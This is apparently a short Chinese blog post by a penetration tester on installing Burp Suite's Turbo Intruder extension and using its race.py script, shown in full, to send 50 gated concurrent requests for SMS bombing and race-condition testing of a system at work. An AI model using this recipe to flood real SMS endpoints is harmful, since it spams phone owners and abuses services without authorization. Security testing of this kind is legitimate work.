工作需要测试某系统存在的某个漏洞,需要用到高并发模块进行短信轰炸,又get到一个插件使用,冲鸭
一、安装
百度搜索上好多人提供的方法是从burp自带的“商店”中安装插件,但是我的burp就不配合我
迫于无奈只能手动啦,他给出了github链接:https://github.com/portswigger/turbo-intruder
下载jar包,再回到burp
添加jar包路径就可以啦
二使用
很简单,抓包,右击如下图,上面请求包(爆破要添加%s,没有需求可以加在任意位置),下面 python 代码(不同脚本不同情境)选择适合自己的
我要短信爆破,请求包在 Host 下方输入:x-req: %s,python代码选的是 race.py ,就是下面这个
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=50,
requestsPerConnection=100,
pipeline=False
)
# the 'gate' argument blocks the final byte of each request until openGate is invoked('gate'参数阻塞每个请求的最后一个字节,直到openGate被调用)
for i in range(50):
engine.queue(target.req, target.baseInput, gate='race1')
# wait until every 'race1' tagged request is ready(等待直到每个'race1'标记的请求就绪)
# then send the final byte of each request(然后发送每个请求的最后一个字节)
# (this method is non-blocking, just like queue)(这个方法是非阻塞的,就像队列一样)
engine.openGate('race1')
engine.complete(timeout=60)
def handleResponse(req, interesting):
table.add(req)
之后进行攻击即可
攻击结果保密原则就不截图啦
bye